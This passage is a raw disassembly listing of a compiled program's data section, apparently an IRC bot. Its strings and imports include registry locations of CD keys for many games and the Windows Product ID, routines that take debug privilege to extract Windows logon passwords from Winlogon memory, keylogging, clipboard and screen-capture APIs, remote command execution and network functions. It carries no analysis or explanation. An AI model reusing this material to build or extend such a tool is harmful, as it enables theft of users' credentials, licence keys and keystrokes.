dd 80000002h, 429E68h, 429EE8h, 429E44h, 2 dup(0)
dd 80000002h, 429E2Ch, 429EE8h, 429E28h, 2 dup(0)
dd 80000002h, 429E0Ch, 429DFCh, 429DF4h, 2 dup(0)
dd 80000002h, 429DC0h, 429DBCh, 429DA4h, 2 dup(0)
dd 80000002h, 429D68h, 429D5Ch, 429D34h, 429D24h, 429D10h
dd 80000002h, 429CECh, 429CE0h, 429CCCh, 429CBCh, 429CB4h
dd 80000002h, 429CECh, 429CE0h, 429C88h, 429CBCh, 429C80h
dd 80000002h, 429CECh, 429CE0h, 429C50h, 429CBCh, 429C48h
dd 6 dup(0)
dd 3379654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64726F48h, 6F207365h, 68742066h, 6E552065h
dd 64726564h, 296B7261h, 0
dd 3279654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64616853h, 2073776Fh, 5520666Fh, 6572646Eh
dd 6469746Eh, 2965h, 3179654Bh, 3Dh, 636E776Eh, 79656B64h
dd 696E692Eh, 0
aNeverwinterNig db 'Neverwinter Nights',0
align 10h
aLocation db 'Location',0
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0
align 10h
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0
align 4
aBaseMpSof2key db 'base\mp\sof2key',0
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0
align 4
aInstallpath db 'InstallPath',0
db 53h
aOftwareActivis db 'oftware\Activision\Soldier of Fortune II - Double Helix',0
align 4
aHiddenDangerou db 'Hidden & Dangerous 2',0
align 4
aKey db 'key',0 ; DATA XREF: ___:00430A64�o
db 53h
aOftwareIllusio db 'oftware\Illusion Softworks\Hidden & Dangerous 2',0
align 4
aChrome db 'Chrome',0
align 4
aSerialnumber db 'SerialNumber',0
align 4
db 53h
aOftwareTechlan db 'oftware\Techland\Chrome',0
align 4
dd offset word_584F4E
aSoftwareWestwo db 'Software\Westwood\NOX',0
align 4
aCommandAndConq db 'Command and Conquer: Red Alert 2',0
align 4
db 53h
aOftwareWestwoo db 'oftware\Westwood\Red Alert 2',0
align 4
aCommandAndCo_0 db 'Command and Conquer: Red Alert',0
align 4
db 53h
aOftwareWestw_0 db 'oftware\Westwood\Red Alert',0
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0
align 4
aSerial db 'Serial',0
align 10h
db 53h
aOftwareWestw_1 db 'oftware\Westwood\Tiberian Sun',0
align 10h
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0
db 53h
aOftwareRedStor db 'oftware\Red Storm Entertainment\RAVENSHIELD',0
align 4
aNascarRacing20 db 'Nascar Racing 2003',0
align 10h
db 53h
aOftwareElectro db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
align 4
aNascarRacing_0 db 'Nascar Racing 2002',0
align 10h
db 53h
aOftwareElect_0 db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
align 4
aNhl2003 db 'NHL 2003',0
align 4
db 53h
aOftwareElect_1 db 'oftware\Electronic Arts\EA Sports\NHL 2003\ergc',0
align 4
aNhl2002 db 'NHL 2002',0
align 4
db 53h
aOftwareElect_2 db 'oftware\Electronic Arts\EA Sports\NHL 2002\ergc',0
align 4
aFifa2003 db 'FIFA 2003',0
align 4
db 53h
aOftwareElect_3 db 'oftware\Electronic Arts\EA Sports\FIFA 2003\ergc',0
align 4
aFifa2002 db 'FIFA 2002',0
align 4
db 53h
aOftwareElect_4 db 'oftware\Electronic Arts\EA Sports\FIFA 2002\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0
align 10h
db 53h
aOftwareElect_5 db 'oftware\Electronic Arts\EA GAMES\Shogun Total War - Warlord Editi'
db 'on\ergc',0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0
db 53h
aOftwareElect_6 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Underground\ergc',0
align 4
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0
align 4
aErgc db 'ergc',0
align 4
db 53h
aOftwareElect_7 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
align 4
aMedalOfHonorAl db 'Medal of Honor: Allied Assault: Spearhead',0
align 10h
db 53h
aOftwareElect_8 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Sp'
db 'earhead\ergc',0
align 10h
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
align 10h
db 53h
aOftwareElect_9 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Br'
db 'eakthrough\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault',0
align 4
db 53h
aOftwareElec_10 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\er'
db 'gc',0
align 4
aGlobalOperatio db 'Global Operations',0
align 10h
db 53h
aOftwareElec_11 db 'oftware\Electronic Arts\EA GAMES\Global Operations\ergc',0
align 4
aCommandAndCo_2 db 'Command and Conquer: Generals',0
align 4
db 53h
aOftwareElec_12 db 'oftware\Electronic Arts\EA GAMES\Generals\ergc',0
aJamesBond007Ni db 'James Bond 007: Nightfire',0
align 4
db 53h
aOftwareElec_13 db 'oftware\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
aCommandAndCo_3 db 'Command and Conquer: Generals (Zero Hour)',0
align 4
db 53h
aOftwareElec_14 db 'oftware\Electronic Arts\EA GAMES\Command and Conquer Generals Zer'
db 'o Hour\ergc',0
align 4
aBlackAndWhite db 'Black and White',0
db 53h
aOftwareElec_15 db 'oftware\Electronic Arts\EA GAMES\Black and White\ergc',0
align 4
aBattlefieldVie db 'Battlefield Vietnam',0
db 53h
aOftwareElec_16 db 'oftware\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
align 4
aBattlefield194 db 'Battlefield 1942 (Secret Weapons of WWII)',0
align 4
db 53h
aOftwareElec_17 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons '
db 'of WWII\ergc',0
align 4
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0
db 53h
aOftwareElec_18 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rom'
db 'e\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942',0
align 4
db 53h
aOftwareElec_19 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
aFreedomForce db 'Freedom Force',0
align 10h
db 53h
aOftwareElec_20 db 'oftware\Electronic Arts\EA Distribution\Freedom Force\ergc',0
aIgi2CovertStri db 'IGI 2: Covert Strike',0
align 4
db 53h
aOftwareIgi2Ret db 'oftware\IGI 2 Retail',0
align 4
aUnrealTourname db 'Unreal Tournament 2004',0
align 4
db 53h
aOftwareUnrealT db 'oftware\Unreal Technology\Installed Apps\UT2004',0
align 4
aUnrealTourna_0 db 'Unreal Tournament 2003',0
align 10h
db 53h
aOftwareUnrea_0 db 'oftware\Unreal Technology\Installed Apps\UT2003',0
align 4
aMicrosoftWindo db 'Microsoft Windows Product ID',0
align 4
aProductid db 'ProductId',0
align 10h
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion',0
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
align 4
aLegendsOfMight db 'Legends of Might and Magic',0
align 10h
aCustomernumber db 'CustomerNumber',0
align 10h
aSoftware3d0Sta db 'Software\3d0\Status',0
aIndustryGiant2 db 'Industry Giant 2',0
align 4
aPrvkey db 'prvkey',0
align 10h
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0
align 4
aHalfLife db 'Half-Life',0
align 10h
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0
align 4
aGunmanChronicl db 'Gunman Chronicles',0
align 4
aKey_0 db 'Key',0
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0
align 4
aTheGladiators db 'The Gladiators',0
align 4
aRegnumber db 'RegNumber',0
align 4
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0
align 10h
aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: ___:0042981C�o
aCdkey db 'CDKey',0 ; DATA XREF: ___:00429818�o
align 10h
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: ___:off_429814�o
align 4
asc_42AA18: ; DATA XREF: sub_408B8D+E9�o
; sub_408B8D+F4�o
unicode 0, <=>,0
aR: ; DATA XREF: sub_408B8D+8F�o
; sub_40F6F1:loc_414142�o
unicode 0, <r>,0
aSS_3 db '%s\%s',0 ; DATA XREF: sub_408B8D+7E�o
; sub_408E5A+45�o ...
align 4
aSCdKeyS_ db '%s CD Key: (%s).',0 ; DATA XREF: sub_408B8D+2B�o
align 4
unk_42AA3C db 2 ; DATA XREF: sub_408D42+C5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesFoundD_ db ' Files found: %d.',0
unk_42AA6C db 2 ; DATA XREF: sub_408D42+5C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingForFi db ' Searching for file: %s.',0
align 4
aFoundSS db ' Found: %s\%s',0 ; DATA XREF: sub_408E5A+107�o
align 4
aS_3 db '%s\*',0 ; DATA XREF: sub_408E5A+1A�o
align 4
unk_42AABC db 2 ; DATA XREF: sub_408FAC:loc_409125�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToEnable db ' Failed to enable Debug Privilege.',0
align 10h
unk_42AB00 db 2 ; DATA XREF: sub_408FAC:loc_4090F8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToFindWi db ' Unable to find Winlogon Process ID.',0
unk_42AB44 db 2 ; DATA XREF: sub_408FAC:loc_4090F1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToFindTh db ' Unable to find the password in memory.',0
align 4
unk_42AB8C db 2 ; DATA XREF: sub_408FAC+117�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLogo db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/(no password)).',0
align 4
off_42AC04 dd offset byte_530055 ; DATA XREF: sub_408FAC+DC�o
dd offset byte_520045
dd offset dword_4F0044
dd offset loc_41004A+3
dd offset byte_4E0049
dd 0
off_42AC1C dd offset byte_530055 ; DATA XREF: sub_408FAC+CE�o
dd offset byte_520045
dd offset loc_41004A+4
dd offset byte_45004D
align 10h
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_408FAC+9A�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_408FAC+8D�o
align 4
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_408FAC+80�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_408FAC+73�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_408FAC+68�o
align 10h
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_408FAC+55�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_408FAC+40�o
; sub_408FAC+161�o ...
align 10h
unk_42ACE0 db 2 ; DATA XREF: sub_408FAC+35�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aOnlySupportedO db ' Only supported on Windows NT/2000.',0
align 4
aMsgina db 'MSGINA',0 ; DATA XREF: sub_40917E+13E�o
align 4
aNwgina db 'NWGINA',0 ; DATA XREF: sub_40917E+123�o
align 4
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_40917E+AF�o
align 10h
unk_42AD40 db 2 ; DATA XREF: sub_4095E4+70�o
; sub_40967B+C7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLo_0 db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/%S).',0
align 4
unk_42ADAC db 2 ; DATA XREF: sub_40967B+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLo_1 db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/(N/A)).',0
align 4
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_409794+C50�o
align 4
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_409794+C48�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_409794:loc_40A3CF�o
align 10h
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_409794+BE6�o
align 10h
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_409794+BD9�o
align 10h
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_409794+BCC�o
align 10h
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_409794+BBF�o
align 10h
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_409794+BB2�o
align 10h
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_409794+BAA�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_409794:loc_40A331�o
align 10h
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_409794+B68�o
align 10h
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_409794+B60�o
align 10h
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_409794:loc_40A2E7�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_409794+B0E�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_409794+B01�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_409794+AF4�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_409794+AEC�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_409794:loc_40A273�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_409794+AAA�o
align 10h
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_409794+AA2�o
align 10h
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_409794:loc_40A229�o
align 10h
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_409794+A60�o
align 10h
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_409794+A58�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_409794:loc_40A1DF�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_409794+9CE�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_409794+9C1�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_409794+9B4�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_409794+9A7�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_409794+99A�o
align 10h
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_409794+98D�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_409794+980�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_409794+973�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_409794+966�o
align 4
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_409794+959�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_409794+951�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_409794:loc_40A0D4�o
align 10h
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409794+903�o
align 10h
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409794+8F6�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409794+8EE�o
align 10h
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_409794:loc_40A075�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_409794+8B4�o
align 4
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_409794+842�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_409794+835�o
align 10h
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_409794+828�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_409794+81B�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_409794+80E�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_409794+801�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_409794+7F4�o
align 10h
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_409794+7E7�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_409794+7DA�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_409794+7D2�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_409794:loc_409F55�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_409794+688�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_409794+67B�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_409794+66E�o
align 10h
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_409794+661�o
align 10h
aGethostname db 'gethostname',0 ; DATA XREF: sub_409794+654�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_409794+647�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_409794+63A�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_409794+62D�o
; ___:0042F1B8�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_409794+620�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_409794+613�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_409794+60B�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_409794+5F9�o
align 10h
aRecv db 'recv',0 ; DATA XREF: sub_409794+5EC�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_409794+5DF�o
align 10h
aSend db 'send',0 ; DATA XREF: sub_409794+5D2�o
; sub_40F6F1+22E8�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_409794+5C5�o
align 10h
aNtohs db 'ntohs',0 ; DATA XREF: sub_409794+5B8�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_409794+5AB�o
align 10h
aHtons db 'htons',0 ; DATA XREF: sub_409794+59E�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_409794+591�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_409794+584�o
align 10h
aConnect db 'connect',0 ; DATA XREF: sub_409794+577�o
; ___:0042F5C8�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_409794+56A�o
aSocket db 'socket',0 ; DATA XREF: sub_409794+55D�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_409794+550�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_409794+543�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_409794+536�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_409794+529�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_409794+51C�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_409794+50F�o
align 10h
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_409794+507�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_409794+4F6�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_409794+483�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_409794+476�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_409794+469�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_409794+45C�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_409794+44F�o
align 10h
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_409794+442�o
align 10h
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_409794+435�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_409794+428�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_409794+420�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_409794:loc_409BA3�o
align 10h
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_409794:loc_409B7B�o
align 10h
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_409794+38F�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_409794+382�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_409794+375�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_409794+368�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_409794+35B�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_409794+34E�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_409794+341�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_409794:loc_409ACD�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_409794+309�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_409794+2FC�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_409794:loc_409A88�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_409794+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_409794+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_409794+292�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_409794+285�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_409794+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_409794+270�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_409794:loc_4099F3�o
align 4
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_409794+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_409794+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_409794+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_409794:loc_40998C�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_409794+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_409794+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_409794+186�o
align 10h
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_409794+179�o
align 10h
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_409794+16C�o
align 10h
aIswindow db 'IsWindow',0 ; DATA XREF: sub_409794+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_409794+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_409794+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_409794:loc_4098C9�o
; sub_41EE5D+D�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_409794:loc_40989C�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_409794+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_409794+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_409794+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_409794+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_409794+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_409794+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_409794+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_409794+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_409794+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_409794+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_409794+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_409794+A�o
align 4
unk_42B6E4 db 2 ; DATA XREF: sub_40A421+2F2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDllTestComplet db ' DLL test complete.',0
align 4
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40A421+2CC�o
align 10h
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40A421+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40A421+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40A421+230�o
align 4
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40A421+1FC�o
align 4
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40A421+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A421+194�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40A421+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40A421+12C�o
align 10h
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40A421+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40A421+C4�o
align 10h
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A421+90�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40A421+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40A421+28�o
align 10h
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_40A9AA+72�o
align 4
aMirc db 'mIRC',0 ; DATA XREF: sub_40AA6F+5�o
; sub_416233+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_40AAF1+1C�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_40AB95+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_40ABB7+140�o
align 4
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_40ABB7+85�o
